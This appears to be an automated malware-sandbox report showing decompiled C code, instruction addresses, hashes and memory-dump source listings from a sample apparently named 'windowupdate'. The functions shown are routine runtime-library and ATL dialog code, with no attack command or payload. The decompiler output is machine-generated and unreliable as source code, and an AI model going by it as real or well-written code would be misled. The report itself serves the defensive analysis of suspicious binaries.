													goto L48;
												}
												 *((char*)(_a12 + _a16 - 1)) = 0;
												_v1180 = 0xfffffffe;
												E00D67050( &_v1120);
												E00D67230( &_v1224);
												_t138 = _v1180;
												goto L48;
											}
											_v1176 = 0xffffffff;
											E00D67050( &_v1120);
											E00D67230( &_v1224);
											_t138 = _v1176;
											goto L48;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v1124;
											if(_v1124 >= 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													_t207 = _a12 + _v1132;
													__eflags = _t207;
													 *_t207 = 0;
												} else {
													 *((char*)(_a12 + _a16 - 1)) = 0;
												}
											} else {
												_t207 = _a12;
												 *_a12 = 0;
											}
										}
										goto L47;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L27:
										__eflags = _v1132 - _a16;
										if(_v1132 == _a16) {
											__eflags = _v1124;
											if(_v1124 < 0) {
												L32:
												goto L47;
											}
											_t207 = _v1124;
											__eflags = _v1124 - _a16;
											if(_v1124 <= _a16) {
												goto L32;
											}
											_v1172 = 0xffffffff;
											E00D67050( &_v1120);
											E00D67230( &_v1224);
											_t138 = _v1172;
											goto L48;
										}
										 *(_a12 + _v1132) = 0;
										goto L32;
									}
									__eflags = _v1124;
									if(_v1124 == 0) {
										goto L27;
									}
									_v1168 = 0xffffffff;
									E00D67050( &_v1120);
									E00D67230( &_v1224);
									_t138 = _v1168;
									goto L48;
								}
								_t207 = _v1124;
								_v1164 = _v1124;
								E00D67050( &_v1120);
								E00D67230( &_v1224);
								_t138 = _v1164;
								goto L48;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L20;
							}
							_v1160 = 0;
							goto L21;
						} else {
							 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
							_t138 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							L48:
							return E00D47280(_t138, _t159, _v8 ^ _t212, _t207, _t210, _t211);
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L11;
					}
					_v1152 = 0;
					goto L12;
				}
				 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
				_t138 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
				goto L48;
			}








































                      0x00d5e250
                      0x00d5e250
                      0x00d5e250
                      0x00d5e250
                      0x00d5e25b
                      0x00d5e262
                      0x00d5e269
                      0x00d5e277
                      0x00d5e26b
                      0x00d5e26b
                      0x00d5e26b
                      0x00d5e287
                      0x00d5e28d
                      0x00d5e294
                      0x00d5e2ae
                      0x00d5e2b3
                      0x00d5e2b9
                      0x00d5e2bb
                      0x00d5e2bb
                      0x00d5e2b9
                      0x00d5e2c3
                      0x00d5e2f6
                      0x00d5e2fa
                      0x00d5e30e
                      0x00d5e30e
                      0x00d5e318
                      0x00d5e31e
                      0x00d5e324
                      0x00d5e32b
                      0x00d5e345
                      0x00d5e34a
                      0x00d5e34d
                      0x00d5e350
                      0x00d5e352
                      0x00d5e352
                      0x00d5e350
                      0x00d5e353
                      0x00d5e35a
                      0x00d5e397
                      0x00d5e39e
                      0x00d5e3a4
                      0x00d5e3aa
                      0x00d5e3b0
                      0x00d5e3b9
                      0x00d5e3c2
                      0x00d5e3c8
                      0x00d5e3de
                      0x00d5e3e4
                      0x00d5e3f0
                      0x00d5e3f6
                      0x00d5e40a
                      0x00d5e40a
                      0x00d5e414
                      0x00d5e41a
                      0x00d5e42a
                      0x00d5e455
                      0x00d5e465
                      0x00d5e46b
                      0x00d5e46f
                      0x00d5e4aa
                      0x00d5e4b0
                      0x00d5e4bc
                      0x00d5e4c2
                      0x00d5e56d
                      0x00d5e573
                      0x00d5e57f
                      0x00d5e57f
                      0x00d5e585
                      0x00d5e5ce
                      0x00d5e5d2
                      0x00d5e604
                      0x00d5e607
                      0x00d5e640
                      0x00d5e640
                      0x00d5e646
                      0x00d5e649
                      0x00d5e64f
                      0x00d5e65b
                      0x00d5e666
                      0x00d5e66b
                      0x00000000
                      0x00d5e66b
                      0x00d5e60f
                      0x00d5e613
                      0x00d5e623
                      0x00d5e62e
                      0x00d5e633
                      0x00000000
                      0x00d5e633
                      0x00d5e5d4
                      0x00d5e5e4
                      0x00d5e5ef
                      0x00d5e5f4
                      0x00000000
                      0x00d5e5f4
                      0x00d5e587
                      0x00d5e58b
                      0x00d5e58f
                      0x00d5e596
                      0x00d5e5af
                      0x00d5e5b2
                      0x00d5e5c3
                      0x00d5e5c3
                      0x00d5e5c9
                      0x00d5e5b4
                      0x00d5e5ba
                      0x00d5e5ba
                      0x00d5e598
                      0x00d5e5a0
                      0x00d5e5a3
                      0x00d5e5a3
                      0x00d5e596
                      0x00000000
                      0x00d5e5cc
                      0x00d5e4c8
                      0x00d5e4cc
                      0x00d5e504
                      0x00d5e50a
                      0x00d5e50d
                      0x00d5e51d
                      0x00d5e524
                      0x00d5e55c
                      0x00000000
                      0x00d5e55c
                      0x00d5e526
                      0x00d5e52c
                      0x00d5e52f
                      0x00000000
                      0x00000000
                      0x00d5e531
                      0x00d5e541
                      0x00d5e54c
                      0x00d5e551
                      0x00000000
                      0x00d5e551
                      0x00d5e518
                      0x00000000
                      0x00d5e518
                      0x00d5e4ce
                      0x00d5e4d5
                      0x00000000
                      0x00000000
                      0x00d5e4d7
                      0x00d5e4e7
                      0x00d5e4f2
                      0x00d5e4f7
                      0x00000000
                      0x00d5e4f7
                      0x00d5e471
                      0x00d5e477
                      0x00d5e483
                      0x00d5e48e
                      0x00d5e493
                      0x00000000
                      0x00d5e493
                      0x00d5e3f8
                      0x00d5e3fc
                      0x00000000
                      0x00000000
                      0x00d5e3fe
                      0x00000000
                      0x00d5e35c
                      0x00d5e361
                      0x00d5e385
                      0x00d5e671
                      0x00d5e67e
                      0x00d5e67e
                      0x00d5e35a
                      0x00d5e2fc
                      0x00d5e300
                      0x00000000
                      0x00000000
                      0x00d5e302
                      0x00000000
                      0x00d5e302
                      0x00d5e2ca
                      0x00d5e2ee
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5E449
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 54b29a80bc5762847f92008e8078f952d341d00c56f9e328aedc2a69aad33116
                      • Instruction ID: bcca19f9b00d06849b5a67482e62bae5bc852874000f7c1d9b7075bfc27e1044
                      • Opcode Fuzzy Hash: 54b29a80bc5762847f92008e8078f952d341d00c56f9e328aedc2a69aad33116
                      • Instruction Fuzzy Hash: 1CC13DB090421D8FDF28EF14CD91BAEB7B0AB51319F1441D9E94967281EB709E88CF79
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5D9D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00D5D9D0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v2744;
				signed int _v2748;
				char _v2752;
				char _v2756;
				signed int _v2760;
				char _v2764;
				char _v2768;
				intOrPtr _v2772;
				signed int _v2776;
				signed int _v2780;
				char _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				char _v2848;
				char _v2852;
				signed int _t117;
				void* _t125;
				signed int _t138;
				void* _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t211 = __esi;
				_t210 = __edi;
				_t160 = __ecx;
				_t159 = __ebx;
				_t117 =  *0xdf600c; // 0x71e60372
				_v8 = _t117 ^ _t212;
				if(_a20 == 0) {
					_v2768 = 0;
				} else {
					_v2768 = 1;
				}
				_v2772 = _v2768;
				_t217 = _v2772;
				if(_v2772 == 0) {
					_t158 = L00D84930(_t217, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t213 = _t213 + 0x18;
					if(_t158 == 1) {
						asm("int3");
					}
				}
				if(_v2772 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L11:
						_v2776 = 1;
						L12:
						_v2780 = _v2776;
						__eflags = _v2780;
						if(__eflags == 0) {
							_t155 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t213 = _t213 + 0x18;
							__eflags = _t155 - 1;
							if(_t155 == 1) {
								asm("int3");
							}
						}
						__eflags = _v2780;
						if(_v2780 != 0) {
							L00D66CC0(_t159,  &_v2848, _t211, _a24);
							_v2764 = 0;
							_v2760 = 0;
							_v2756 = 0;
							_v2752 = 0;
							_v2764 = _a12;
							_v2760 = _a16;
							_v2756 = 0;
							_v2816 = _a4 & 0x00000002;
							_v2812 = _a8 & 0x00000000;
							__eflags = _v2816 | _v2812;
							if((_v2816 | _v2812) != 0) {
								L20:
								_v2784 = 1;
								L21:
								_v2752 = _v2784;
								_t125 = E00D67A60( &_v2848);
								E00D66AC0( &_v2744, E00D66C80( &_v2852,  &_v2764), _a4, _a8, _a20, _t125, _a28);
								_v2748 = E00D6AB00( &_v2744, _t210);
								__eflags = _a12;
								if(_a12 != 0) {
									_v2824 = _a4 & 0x00000001;
									_v2820 = _a8 & 0x00000000;
									__eflags = _v2824 | _v2820;
									if((_v2824 | _v2820) == 0) {
										_v2832 = _a4 & 0x00000002;
										_v2828 = _a8 & 0x00000000;
										_t207 = _v2832 | _v2828;
										__eflags = _v2832 | _v2828;
										if((_v2832 | _v2828) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v2756 - _a16;
												if(_v2756 != _a16) {
													_t207 = _a12 + _v2756;
													__eflags = _t207;
													 *_t207 = 0;
													L47:
													_v2808 = _v2748;
													E00D67030( &_v2744);
													E00D67230( &_v2848);
													_t138 = _v2808;
													goto L48;
												}
												 *((char*)(_a12 + _a16 - 1)) = 0;
												_v2804 = 0xfffffffe;
												E00D67030( &_v2744);
												E00D67230( &_v2848);
												_t138 = _v2804;
												goto L48;
											}
											_v2800 = 0xffffffff;
											E00D67030( &_v2744);
											E00D67230( &_v2848);
											_t138 = _v2800;
											goto L48;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v2748;
											if(_v2748 >= 0) {
												__eflags = _v2756 - _a16;
												if(_v2756 != _a16) {
													_t207 = _a12 + _v2756;
													__eflags = _t207;
													 *_t207 = 0;
												} else {
													 *((char*)(_a12 + _a16 - 1)) = 0;
												}
											} else {
												_t207 = _a12;
												 *_a12 = 0;
											}
										}
										goto L47;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L27:
										__eflags = _v2756 - _a16;
										if(_v2756 == _a16) {
											__eflags = _v2748;
											if(_v2748 < 0) {
												L32:
												goto L47;
											}
											_t207 = _v2748;
											__eflags = _v2748 - _a16;
											if(_v2748 <= _a16) {
												goto L32;
											}
											_v2796 = 0xffffffff;
											E00D67030( &_v2744);
											E00D67230( &_v2848);
											_t138 = _v2796;
											goto L48;
										}
										 *(_a12 + _v2756) = 0;
										goto L32;
									}
									__eflags = _v2748;
									if(_v2748 == 0) {
										goto L27;
									}
									_v2792 = 0xffffffff;
									E00D67030( &_v2744);
									E00D67230( &_v2848);
									_t138 = _v2792;
									goto L48;
								}
								_t207 = _v2748;
								_v2788 = _v2748;
								E00D67030( &_v2744);
								E00D67230( &_v2848);
								_t138 = _v2788;
								goto L48;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L20;
							}
							_v2784 = 0;
							goto L21;
						} else {
							 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
							_t138 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							L48:
							return E00D47280(_t138, _t159, _v8 ^ _t212, _t207, _t210, _t211);
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L11;
					}
					_v2776 = 0;
					goto L12;
				}
				 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
				_t138 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
				goto L48;
			}








































                      0x00d5d9d0
                      0x00d5d9d0
                      0x00d5d9d0
                      0x00d5d9d0
                      0x00d5d9db
                      0x00d5d9e2
                      0x00d5d9e9
                      0x00d5d9f7
                      0x00d5d9eb
                      0x00d5d9eb
                      0x00d5d9eb
                      0x00d5da07
                      0x00d5da0d
                      0x00d5da14
                      0x00d5da2e
                      0x00d5da33
                      0x00d5da39
                      0x00d5da3b
                      0x00d5da3b
                      0x00d5da39
                      0x00d5da43
                      0x00d5da76
                      0x00d5da7a
                      0x00d5da8e
                      0x00d5da8e
                      0x00d5da98
                      0x00d5da9e
                      0x00d5daa4
                      0x00d5daab
                      0x00d5dac5
                      0x00d5daca
                      0x00d5dacd
                      0x00d5dad0
                      0x00d5dad2
                      0x00d5dad2
                      0x00d5dad0
                      0x00d5dad3
                      0x00d5dada
                      0x00d5db17
                      0x00d5db1e
                      0x00d5db24
                      0x00d5db2a
                      0x00d5db30
                      0x00d5db39
                      0x00d5db42
                      0x00d5db48
                      0x00d5db5e
                      0x00d5db64
                      0x00d5db70
                      0x00d5db76
                      0x00d5db8a
                      0x00d5db8a
                      0x00d5db94
                      0x00d5db9a
                      0x00d5dbaa
                      0x00d5dbd5
                      0x00d5dbe5
                      0x00d5dbeb
                      0x00d5dbef
                      0x00d5dc2a
                      0x00d5dc30
                      0x00d5dc3c
                      0x00d5dc42
                      0x00d5dced
                      0x00d5dcf3
                      0x00d5dcff
                      0x00d5dcff
                      0x00d5dd05
                      0x00d5dd4e
                      0x00d5dd52
                      0x00d5dd84
                      0x00d5dd87
                      0x00d5ddc0
                      0x00d5ddc0
                      0x00d5ddc6
                      0x00d5ddc9
                      0x00d5ddcf
                      0x00d5dddb
                      0x00d5dde6
                      0x00d5ddeb
                      0x00000000
                      0x00d5ddeb
                      0x00d5dd8f
                      0x00d5dd93
                      0x00d5dda3
                      0x00d5ddae
                      0x00d5ddb3
                      0x00000000
                      0x00d5ddb3
                      0x00d5dd54
                      0x00d5dd64
                      0x00d5dd6f
                      0x00d5dd74
                      0x00000000
                      0x00d5dd74
                      0x00d5dd07
                      0x00d5dd0b
                      0x00d5dd0f
                      0x00d5dd16
                      0x00d5dd2f
                      0x00d5dd32
                      0x00d5dd43
                      0x00d5dd43
                      0x00d5dd49
                      0x00d5dd34
                      0x00d5dd3a
                      0x00d5dd3a
                      0x00d5dd18
                      0x00d5dd20
                      0x00d5dd23
                      0x00d5dd23
                      0x00d5dd16
                      0x00000000
                      0x00d5dd4c
                      0x00d5dc48
                      0x00d5dc4c
                      0x00d5dc84
                      0x00d5dc8a
                      0x00d5dc8d
                      0x00d5dc9d
                      0x00d5dca4
                      0x00d5dcdc
                      0x00000000
                      0x00d5dcdc
                      0x00d5dca6
                      0x00d5dcac
                      0x00d5dcaf
                      0x00000000
                      0x00000000
                      0x00d5dcb1
                      0x00d5dcc1
                      0x00d5dccc
                      0x00d5dcd1
                      0x00000000
                      0x00d5dcd1
                      0x00d5dc98
                      0x00000000
                      0x00d5dc98
                      0x00d5dc4e
                      0x00d5dc55
                      0x00000000
                      0x00000000
                      0x00d5dc57
                      0x00d5dc67
                      0x00d5dc72
                      0x00d5dc77
                      0x00000000
                      0x00d5dc77
                      0x00d5dbf1
                      0x00d5dbf7
                      0x00d5dc03
                      0x00d5dc0e
                      0x00d5dc13
                      0x00000000
                      0x00d5dc13
                      0x00d5db78
                      0x00d5db7c
                      0x00000000
                      0x00000000
                      0x00d5db7e
                      0x00000000
                      0x00d5dadc
                      0x00d5dae1
                      0x00d5db05
                      0x00d5ddf1
                      0x00d5ddfe
                      0x00d5ddfe
                      0x00d5dada
                      0x00d5da7c
                      0x00d5da80
                      0x00000000
                      0x00000000
                      0x00d5da82
                      0x00000000
                      0x00d5da82
                      0x00d5da4a
                      0x00d5da6e
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5DBC9
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 68e06a79ce3a42349502befe7303cfe682032314c93ab5b01161dad75a2444ea
                      • Instruction ID: e2d6d391970878d1d2743c4c5841099b786e3a53b18351e9b4025b878146dbc9
                      • Opcode Fuzzy Hash: 68e06a79ce3a42349502befe7303cfe682032314c93ab5b01161dad75a2444ea
                      • Instruction Fuzzy Hash: 25C1F570A0435D8BDF34DF18CC51BAAB7B2BB15319F1441D9E80A6A681DB749E88CF72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D45360 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 241COMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00D45360(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _t86;
				void* _t88;
				void* _t93;
				void* _t101;
				void* _t109;
				void* _t115;
				void* _t117;
				void* _t120;
				signed int _t160;
				void* _t181;
				void* _t182;

				_t180 = __esi;
				_t179 = __edi;
				_t160 = __edx;
				_t121 = __ebx;
				_v32 = 0xcccccccc;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_v16 = 1;
				_v32 = _a24;
				_t184 = _v32;
				if(_v32 == 0) {
					__eflags = _a8 - 0x110;
					if(__eflags != 0) {
						L5:
						__eflags = _a8 - 0x111;
						if(_a8 != 0x111) {
							L9:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L13:
								__eflags = _a8 - 0x111;
								if(_a8 != 0x111) {
									L17:
									__eflags = _a8 - 0x111;
									if(_a8 != 0x111) {
										L21:
										__eflags = _a8 - 0x111;
										if(_a8 != 0x111) {
											L25:
											__eflags = _a8 - 0x111;
											if(_a8 != 0x111) {
												L29:
												L33:
												_t86 = 0;
												L34:
												_push(_t160);
												E00DC14C0(_t181, 0xd45684);
												_t88 = _t86;
												return E00DC1520(_t88, _t181 - _t182 + 0x1c);
											}
											_t160 = _a12 & 0x0000ffff;
											__eflags = (_t160 & 0x0000ffff) - 0xd2;
											if(__eflags != 0) {
												goto L29;
											}
											_v16 = 1;
											_t93 = E00DC0980(_t121, _v8, _a16, _t179, _t180, __eflags, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
											_t160 = _a20;
											 *_t160 = _t93;
											__eflags = _v16;
											if(_v16 == 0) {
												goto L29;
											}
											_t86 = 1;
											goto L34;
										}
										__eflags = (_a12 & 0xffff) - 0xd4;
										if(__eflags != 0) {
											goto L25;
										}
										_v16 = 1;
										_t160 = _a12 >> 0x00000010 & 0x0000ffff;
										 *_a20 = E00DC0840(_t121, _v8, _t160, _t179, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
										__eflags = _v16;
										if(_v16 == 0) {
											goto L25;
										}
										_t86 = 1;
										goto L34;
									}
									_t160 = _a12 & 0x0000ffff;
									__eflags = (_t160 & 0x0000ffff) - 0xd3;
									if(__eflags != 0) {
										goto L21;
									}
									_v16 = 1;
									_t101 = E00DC0AC0(_t121, _v8, _a16, _t179, _t180, __eflags, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
									_t160 = _a20;
									 *_t160 = _t101;
									__eflags = _v16;
									if(_v16 == 0) {
										goto L21;
									}
									_t86 = 1;
									goto L34;
								}
								__eflags = (_a12 & 0xffff) - 0xd1;
								if(__eflags != 0) {
									goto L17;
								}
								_v16 = 1;
								_t160 = _a12 >> 0x00000010 & 0x0000ffff;
								 *_a20 = E00DC0C00(_t121, _v8, _t160, _t179, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
								__eflags = _v16;
								if(_v16 == 0) {
									goto L17;
								}
								_t86 = 1;
								goto L34;
							}
							_t160 = _a12 & 0x0000ffff;
							__eflags = (_t160 & 0x0000ffff) - 2;
							if((_t160 & 0x0000ffff) != 2) {
								goto L13;
							}
							_v16 = 1;
							_t109 = E00DC0D40(_v8, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
							_t160 = _a20;
							 *_t160 = _t109;
							__eflags = _v16;
							if(_v16 == 0) {
								goto L13;
							}
							_t86 = 1;
							goto L34;
						}
						__eflags = (_a12 & 0xffff) - 1;
						if(__eflags != 0) {
							goto L9;
						}
						_v16 = 1;
						_t160 = _a12 >> 0x00000010 & 0x0000ffff;
						 *_a20 = E00DC0D90(_v8, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
						__eflags = _v16;
						if(_v16 == 0) {
							goto L9;
						}
						_t86 = 1;
						goto L34;
					}
					_v16 = 1;
					_t115 = E00DC0E20(__ebx, _v8, __edi, __esi, __eflags, _a8, _a12, _a16,  &_v16);
					_t160 = _a20;
					 *_t160 = _t115;
					__eflags = _v16;
					if(_v16 == 0) {
						goto L5;
					}
					_t86 = 1;
					goto L34;
				}
				_t117 = E00D3F1E0(0xf23748);
				E00D323E0(__ebx, __edi, __esi, _t184, E00D323B0( &_v28, "C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\DuckDoerDlg.h", 0x26), _t117, 0, "Invalid message map ID (%i)\n", _a24);
				_t182 = _t182 + 0x14;
				if(0 == 0) {
					_t120 = L00D84930(0, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\DuckDoerDlg.h", 0x26, 0, "%ls", 0xde40dc);
					_t182 = _t182 + 0x18;
					if(_t120 == 1) {
						asm("int3");
					}
				}
				goto L33;
			}





















                      0x00d45360
                      0x00d45360
                      0x00d45360
                      0x00d45360
                      0x00d4536b
                      0x00d4536e
                      0x00d45371
                      0x00d45374
                      0x00d45377
                      0x00d4537a
                      0x00d4537d
                      0x00d45380
                      0x00d45383
                      0x00d4538d
                      0x00d45390
                      0x00d45394
                      0x00d4539b
                      0x00d453a2
                      0x00d453d8
                      0x00d453d8
                      0x00d453df
                      0x00d45434
                      0x00d45434
                      0x00d4543b
                      0x00d45490
                      0x00d45490
                      0x00d45497
                      0x00d454ef
                      0x00d454ef
                      0x00d454f6
                      0x00d4554d
                      0x00d4554d
                      0x00d45554
                      0x00d455ac
                      0x00d455ac
                      0x00d455b3
                      0x00d45607
                      0x00d4565e
                      0x00d4565e
                      0x00d45660
                      0x00d45660
                      0x00d4566a
                      0x00d4566f
                      0x00d4567e
                      0x00d4567e
                      0x00d455b8
                      0x00d455c1
                      0x00d455c6
                      0x00000000
                      0x00000000
                      0x00d455c8
                      0x00d455f0
                      0x00d455f5
                      0x00d455f8
                      0x00d455fa
                      0x00d455fe
                      0x00000000
                      0x00000000
                      0x00d45600
                      0x00000000
                      0x00d45600
                      0x00d45561
                      0x00d45567
                      0x00000000
                      0x00000000
                      0x00d45569
                      0x00d45588
                      0x00d4559a
                      0x00d4559c
                      0x00d455a0
                      0x00000000
                      0x00000000
                      0x00d455a2
                      0x00000000
                      0x00d455a2
                      0x00d454fb
                      0x00d45504
                      0x00d45509
                      0x00000000
                      0x00000000
                      0x00d4550b
                      0x00d45533
                      0x00d45538
                      0x00d4553b
                      0x00d4553d
                      0x00d45541
                      0x00000000
                      0x00000000
                      0x00d45543
                      0x00000000
                      0x00d45543
                      0x00d454a4
                      0x00d454aa
                      0x00000000
                      0x00000000
                      0x00d454ac
                      0x00d454cb
                      0x00d454dd
                      0x00d454df
                      0x00d454e3
                      0x00000000
                      0x00000000
                      0x00d454e5
                      0x00000000
                      0x00d454e5
                      0x00d45440
                      0x00d45449
                      0x00d4544c
                      0x00000000
                      0x00000000
                      0x00d4544e
                      0x00d45476
                      0x00d4547b
                      0x00d4547e
                      0x00d45480
                      0x00d45484
                      0x00000000
                      0x00000000
                      0x00d45486
                      0x00000000
                      0x00d45486
                      0x00d453ec
                      0x00d453ef
                      0x00000000
                      0x00000000
                      0x00d453f1
                      0x00d45410
                      0x00d45422
                      0x00d45424
                      0x00d45428
                      0x00000000
                      0x00000000
                      0x00d4542a
                      0x00000000
                      0x00d4542a
                      0x00d453a4
                      0x00d453be
                      0x00d453c3
                      0x00d453c6
                      0x00d453c8
                      0x00d453cc
                      0x00000000
                      0x00000000
                      0x00d453ce
                      0x00000000
                      0x00d453ce
                      0x00d45619
                      0x00d4562f
                      0x00d45634
                      0x00d45639
                      0x00d45650
                      0x00d45655
                      0x00d4565b
                      0x00d4565d
                      0x00d4565d
                      0x00d4565b
                      0x00000000

                      APIs
                      • _Smanip.LIBCPMTD ref: 00D45629
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D4566A
                      Strings
                      • Invalid message map ID (%i), xrefs: 00D4560D
                      • C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h, xrefs: 00D45621
                      • %ls, xrefs: 00D45640
                      • C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h, xrefs: 00D45649
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
